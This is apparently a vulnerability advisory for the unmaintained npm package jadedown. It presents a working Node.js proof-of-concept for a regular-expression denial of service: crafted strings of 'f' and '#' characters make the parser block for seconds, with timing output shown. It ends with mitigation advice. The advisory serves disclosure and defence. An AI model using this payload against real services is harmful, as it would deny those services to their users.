The jadedown
package is affected by a regular expression denial of service vulnerability when certain types of user input are passed in.
var jadedown = require('jadedown');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
for (i=1;i<=10000000;i=i+1) {
console.log("COUNT: " + i);
var str = genstr(i, 'f') + genstr(i, '#') + '{';
console.log("LENGTH: " + str.length);
var start = process.hrtime();
jadedown(str)
var end = process.hrtime(start);
console.log(end);
}
Results demonstrating blocking for 5 seconds using only 48 characters.
$ node jadedown.js
COUNT: 1
LENGTH: 6
[ 0, 4014065 ]
COUNT: 4
LENGTH: 12
[ 0, 503507 ]
COUNT: 7
LENGTH: 18
[ 0, 325225 ]
COUNT: 10
LENGTH: 24
[ 0, 1632684 ]
COUNT: 13
LENGTH: 30
[ 0, 7541230 ]
COUNT: 16
LENGTH: 36
[ 0, 80889495 ]
COUNT: 19
LENGTH: 42
[ 0, 636009936 ]
COUNT: 22
LENGTH: 48
[ 5, 820586760 ]
This package is not actively maintained, and has not seen an update since 2011.
The package also provides unique functionality in the form of a templating language that is not available elsewhere. If this package is used to process user input, the best available mitigation is to refactor the dependent application to not make use of this module.